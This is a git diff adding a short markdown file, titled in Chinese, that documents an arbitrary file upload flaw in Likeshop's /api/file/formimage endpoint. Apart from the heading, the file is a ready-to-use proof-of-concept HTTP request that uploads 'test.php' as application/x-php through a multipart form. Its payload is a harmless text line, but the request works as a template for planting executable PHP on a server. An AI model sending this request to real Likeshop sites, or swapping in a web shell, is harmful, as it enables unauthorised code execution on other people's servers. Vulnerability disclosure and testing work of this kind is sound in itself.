diff --git a/Likeshop-formimage任意文件上传.md b/Likeshop-formimage任意文件上传.md
new file mode 100644
index 0000000..0e2887e
--- /dev/null
+++ b/Likeshop-formimage任意文件上传.md
@@ -0,0 +1,20 @@
+## Likeshop-formimage任意文件上传
+
+
+## poc
+```
+POST /api/file/formimage HTTP/2
+Host: x.x.x.
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+Connection: close
+Content-Length: 201
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
+Accept-Encoding: gzip, deflate
+
+------WebKitFormBoundarygcflwtei
+Content-Disposition: form-data; name="file";filename="test.php"
+Content-Type: application/x-php
+
+This page has a vulnerability!
+------WebKitFormBoundarygcflwtei--
+```